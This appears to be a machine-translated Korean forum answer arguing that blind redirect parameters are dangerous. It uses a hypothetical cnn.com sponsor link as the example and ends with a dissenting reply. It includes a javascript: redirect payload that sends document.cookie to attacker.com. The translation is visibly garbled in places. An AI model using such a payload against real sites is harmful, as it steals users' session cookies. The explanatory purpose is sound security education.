큰 문제입니다. 나는 당신이처럼 보이는 링크를 보낼 경우 :
http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14
을 당신은 "아, CNN, 즉 합법적 인 사이트이다", 당신이 그것을 열고 '페이지에 계속'을 클릭 거라고 생각하는거야 링크. 그리고 그물에 가장 예쁜 포르노 사이트 중 하나에 올거야, 너의 동료들에게 알리는 거대한 남자 목소리가 들릴거야. "나는 너를 원해! @ $ @ # $ 너! (& 내가 ⌐ ¡ 수 없을 때까지 ¤ &^$의 §^(#! ~ & $^#! @ $! "당신은 당신의 상사에게 설명해야합니다"나는 CNN 줄 알았는데! "
을
구멍은 여기.이 같은 블라인드 리디렉션 위험하다.
명성입니다 그리고 그. 어떻게 이것에 대해? 한 구멍의
http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie
이제 사이트를 XSS 처리하고 사용자의 쿠키를 도용했습니다. 물론, 로그인 정보는 없지만 세션 데이터는 어떻습니까? 나중에 로그인을 추가하거나 회사의 다른 사람이 사용자가 로그인 한 1 년 후이 페이지를 사용합니다.
두 사이트 중 어디에도 로그인하지 않으면 보안상의 문제가 없습니다. – NotMe